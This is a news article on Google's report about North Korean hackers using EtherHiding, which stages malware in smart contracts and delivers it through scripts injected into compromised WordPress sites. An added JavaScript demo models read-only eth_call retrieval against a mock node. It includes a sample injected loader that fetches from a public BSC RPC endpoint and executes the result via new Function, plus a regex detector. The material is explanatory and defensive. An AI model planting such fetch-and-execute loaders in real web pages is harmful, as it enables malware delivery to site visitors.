Simply put
- Researchers from Google's Threat Intelligence Group have identified North Korean hackers using EtherHiding, a technique that stages malicious code inside smart contracts on public blockchains.
- Because the payload lives on a decentralized public ledger rather than on a server, it is hard to take down, and the loader fetches it without touching a domain or IP address that defenders can block.
- Pro-regime hackers have already siphoned off over $2 billion this year alone, largely from a hack involving the Bybit exchange.
Google's Threat Intelligence Group has raised the alarm about North Korea's use of a blockchain-based malware-delivery technique called EtherHiding. Operations like this, which support cryptocurrency theft, are part of what makes 2025 a notable year for illicit crypto-related activity.
According to Google, EtherHiding has been used by financially motivated criminals to distribute information-stealing malware since at least September 2023; the North Korean activity is the first documented use of the technique by a nation-state actor. It is particularly resistant to conventional takedown tactics.
"Traditional methods typically succeed by blocking known domains or IP addresses, but EtherHiding brings new challenges," researchers noted. They also pointed out that a smart contract on a chain such as BNB Smart Chain or Ethereum can hold the malicious payload with no hosting provider or registrar to take it offline, so the loader stays reachable and the contract can keep serving later stages of the infection chain.
Blockchain scanning tools can flag a contract as malicious, but flagging does not remove it: anyone can still read the contract's state, so the payload remains available and the illicit activity continues.
North Korean hacking threat
This year, North Korean hackers have managed to steal in excess of $2 billion, primarily from a significant $1.46 billion breach of cryptocurrency exchange Bybit in February, as revealed in an October report by blockchain analytics firm Elliptic.
Additionally, North Korea has been linked to attacks on platforms like LND.fi and WOO, with intelligence agencies suggesting that these funds are funneled into the nation’s nuclear and missile programs.
The regime has demonstrated a wide array of tactics designed to infiltrate critical financial systems and extract sensitive corporate data. Their methods include social engineering, deploying malware, and sophisticated cyber espionage strategies. They even go so far as to create fictitious companies or dangle fake job offers to target developers.
Reported incidents indicate that North Korean hacking groups are recruiting people who are not North Korean to act as fronts, sitting through interviews with tech and cryptocurrency firms so that the operators' true identities stay hidden. Other attackers lure victims into fake video calls or podcast recordings and then push them to download malicious "updates" presented as fixes or improvements.
North Korean hackers are also targeting the open-source software supply chain, having uploaded over 300 malicious packages to the npm registry, the public repository that countless developers use to share and install JavaScript software.
How does EtherHiding work?
Google has tracked UNC5342, a North Korean threat actor linked to the group known as Famous Chollima, using EtherHiding in its social engineering campaigns since February 2025.
EtherHiding stores the malicious payload in a smart contract on a public blockchain and reaches users through compromised websites, typically WordPress sites, into which a small JavaScript loader has been injected.
“When a user accesses a compromised site, a loader script executes in their browser,” Google researchers detailed. “This script then reaches out to the blockchain to retrieve the primary malicious payload stored remotely.”
They explained that the loader retrieves the payload with read-only calls (reads of the kind a JSON-RPC eth_call performs, which do not create a transaction), so nothing is written to the chain, no gas fee is paid, and the retrieval leaves no on-chain record. Once the payload has been fetched, it runs in the victim's browser, which can lead to a range of damaging outcomes: fake login interfaces, the installation of data-stealing malware, or even ransomware.
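What the retrieval path and a first-pass detection look like in code, as an added example that is not from Google's report or from any real loader sample. An in-process fake JSON-RPC node stands in for the chain so the example runs offline; the contract address, the 4-byte function selector, the payload string and the sample HTML page are all constructed for the demo, and the RPC hostnames in the detection regex are only illustrative.

```javascript
// Added example (not code from Google's report or from any real loader).
// It models the EtherHiding retrieval path against an in-process fake
// JSON-RPC node so it runs offline. The contract address, 4-byte selector,
// payload string and sample HTML below are all constructed for this demo.

const word = (n) => n.toString(16).padStart(64, "0"); // one 32-byte ABI word

// ABI-encode a single dynamic `string` return value: offset word (0x20),
// length word, then the UTF-8 bytes right-padded to a 32-byte boundary.
function abiEncodeString(s) {
  const hex = Buffer.from(s, "utf8").toString("hex");
  const padded = hex.padEnd(Math.ceil(hex.length / 64) * 64, "0");
  return "0x" + word(32) + word(hex.length / 2) + padded;
}

// Decode that layout; this is the work an injected loader does on the
// eth_call result before handing the string to the next stage.
function abiDecodeString(result) {
  const h = result.startsWith("0x") ? result.slice(2) : result;
  const offset = parseInt(h.slice(0, 64), 16) * 2;           // bytes -> hex chars
  const length = parseInt(h.slice(offset, offset + 64), 16); // byte length
  return Buffer.from(h.slice(offset + 64, offset + 64 + length * 2), "hex").toString("utf8");
}

// Fake node holding one "contract" with one getter. It counts write
// attempts so the no-transaction, no-gas property stays observable.
function makeMockNode({ contract, selector, payload }) {
  const node = { transactionsSent: 0 };
  node.handle = (req) => {
    const reply = (body) => ({ jsonrpc: "2.0", id: req.id, ...body });
    if (req.method === "eth_sendTransaction" || req.method === "eth_sendRawTransaction") {
      node.transactionsSent += 1;
      return reply({ error: { code: -32000, message: "write rejected by demo node" } });
    }
    if (req.method !== "eth_call") return reply({ error: { code: -32601, message: "method not found" } });
    const [call] = req.params;
    if (call.to.toLowerCase() !== contract.toLowerCase() || call.data !== selector) return reply({ result: "0x" });
    return reply({ result: abiEncodeString(payload) });
  };
  return node;
}

// Loader side: one read-only eth_call. No wallet, no signature, no fee.
function fetchStagedPayload(node, contract, selector) {
  const req = { jsonrpc: "2.0", id: 1, method: "eth_call",
                params: [{ to: contract, data: selector }, "latest"] };
  const res = node.handle(req);
  if (res.error || !res.result || res.result === "0x") return null;
  return abiDecodeString(res.result);
}

// Defender side: flag inline scripts that pair a blockchain read with
// dynamic code execution. A heuristic only; real loaders are obfuscated,
// and the hostnames here are just illustrative public RPC endpoints.
const RPC_HINTS = /eth_call|eth_getStorageAt|bsc-dataseed|infura\.io|\bweb3\b|ethers/i;
const EXEC_HINTS = /\beval\s*\(|new\s+Function\s*\(|document\.write\s*\(|\.innerHTML\s*=/;
function scanInlineScripts(html) {
  const findings = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  for (let m; (m = re.exec(html)) !== null; ) {
    const body = m[1];
    if (RPC_HINTS.test(body) && EXEC_HINTS.test(body)) {
      findings.push({ offset: m.index, excerpt: body.trim().slice(0, 80) });
    }
  }
  return findings;
}

// Constructed demo data: placeholder contract, assumed selector, harmless payload.
const DEMO = {
  contract: "0x000000000000000000000000000000000000c0de",
  selector: "0x6d4ce63c",
  payload: "(function(){ /* stage two would be delivered here */ })();",
};
const demoNode = makeMockNode(DEMO);
const CONSTRUCTED_HTML = `<html><body><p>Welcome</p>
<script>
  var rpc = "https://bsc-dataseed.binance.org/";
  fetch(rpc, {method: "POST", body: JSON.stringify({jsonrpc: "2.0", id: 1, method: "eth_call",
    params: [{to: "${DEMO.contract}", data: "${DEMO.selector}"}, "latest"]})})
    .then(r => r.json()).then(j => new Function(decode(j.result))());
</script>
<script>console.log("benign analytics")</script></body></html>`;

function runDemo() {
  return {
    payload: fetchStagedPayload(demoNode, DEMO.contract, DEMO.selector),
    transactionsSent: demoNode.transactionsSent,
    flaggedScripts: scanInlineScripts(CONSTRUCTED_HTML).length,
  };
}
console.log(runDemo());
```

The point the demo makes is the one in the text: the loader only ever issues `eth_call`, so the node's write counter stays at zero and there is no transaction, fee or on-chain trace to investigate, while the page-side scanner has to lean on the combination of a chain read and dynamic execution rather than on a blockable hostname. Treat the regexes as a starting point for a content-security or WAF rule, not as a finished signature.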
The researchers emphasized that this evolution in tactics signifies a worrying trend among cybercriminals. “Essentially, EtherHiding marks a shift to a new generation of bulletproof hosting, where blockchain technology is being repurposed for malicious use.”
